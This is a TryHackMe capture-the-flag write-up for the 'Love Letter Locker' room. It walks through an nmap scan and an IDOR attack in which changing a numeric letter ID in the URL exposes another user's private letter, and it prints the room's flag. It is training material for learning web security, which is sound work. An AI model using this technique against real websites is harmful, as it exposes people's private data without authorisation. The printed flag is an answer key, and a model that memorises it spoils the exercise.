Love Letter Locker | TryHackMe Write-up

Hello everyone! In this write-up, we'll solve the Love Letter Locker room on TryHackMe. The goal is to access hidden love letters and…

iIyas

~2 min read · May 4, 2026 (Updated: May 4, 2026) · Free: Yes

Hello everyone! In this write-up, we'll solve the Love Letter Locker room on TryHackMe. The goal is to access hidden love letters and retrieve the flag. Let's get started.

Reconnaissance

We start by scanning the target machine:

nmap -p- <machine_ip>

The scan reveals two services:

SSH running on one port
A web application running on port 5000

Web Access

We open the application in the browser:

http://<machine_ip>:5000

We land on a web app called Love Letter Locker, where users can register and log in.

After creating an account and logging in, we access a section called Letters.

Application Analysis

Inside the interface, we notice a hint provided by the application:

Every love letter gets a unique number in the archive. Numbers make everything easier to find.

This strongly suggests that letters are identified using numeric IDs.

Hypothesis

Each letter is likely accessed through a predictable URL parameter such as:

/letters/<id>

This indicates a potential IDOR (Insecure Direct Object Reference) vulnerability.

Exploitation

We start by creating a dummy letter filled with random content (e.g. "test test test") to generate a valid entry in the system.

Once the letter is created and opened, we observe the URL structure:

/letters/3

This confirms that each letter is assigned a sequential numeric ID.

To test for IDOR, we manually modify the ID in the URL:

/letters/1

After accessing the modified endpoint, we are able to retrieve another user's letter that was not originally visible to us.

This confirms the presence of an IDOR vulnerability, allowing direct access to objects by manipulating their identifier in the URL.

Flag

Inside the retrieved letter:

THM{1_c4n_r3ad_4ll_l3tters_w1th_th1s_1d0r}

Conclusion

This room demonstrates a classic IDOR vulnerability, where sensitive data can be accessed simply by modifying a parameter in the URL.

No authentication bypass or complex exploitation was required — just understanding how object references are handled.

Impact:

Unauthorized access to other users' private data
Full exposure of stored content through predictable IDs

#ctf #ctf-writeup #tryhackme #cybersecurity #idor

< Go to the original